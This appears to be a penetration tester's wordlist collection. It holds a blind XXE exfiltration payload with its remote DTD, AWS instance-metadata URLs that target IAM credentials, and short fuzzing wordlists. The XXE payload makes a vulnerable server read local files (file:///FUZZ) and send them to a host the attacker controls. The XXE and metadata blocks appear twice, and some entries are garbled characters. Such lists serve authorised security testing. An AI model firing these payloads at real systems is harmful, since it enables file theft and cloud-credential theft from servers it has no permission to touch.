Steve Campbell scampbell-r7

## blind_exfil_server.txt
Start server:
sudo python -m SimpleHTTPServer 80 &> log

In request to vulnerable server:
 <?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "http://<your IP address>/ev.xml">%sp;%param1;]><r>&exfil;</r>

On XXE server side in ev.txt:
<!ENTITY % data SYSTEM "file:///FUZZ">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://<your IP address>/?%data;'>">

## cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

## all.txt

.
..
........
@
*
*.*
*.*.*
ðŸŽ

## content_discovery_all.txt
AdminLogin
`
~/
~
×™×


___
__
_
	Start server:
	sudo python -m SimpleHTTPServer 80 &> log

	In request to vulnerable server:
	<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "http://<your IP address>/ev.xml">%sp;%param1;]><r>&exfil;</r>

	On XXE server side in ev.txt:
	<!ENTITY % data SYSTEM "file:///FUZZ">
	<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://<your IP address>/?%data;'>">
	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key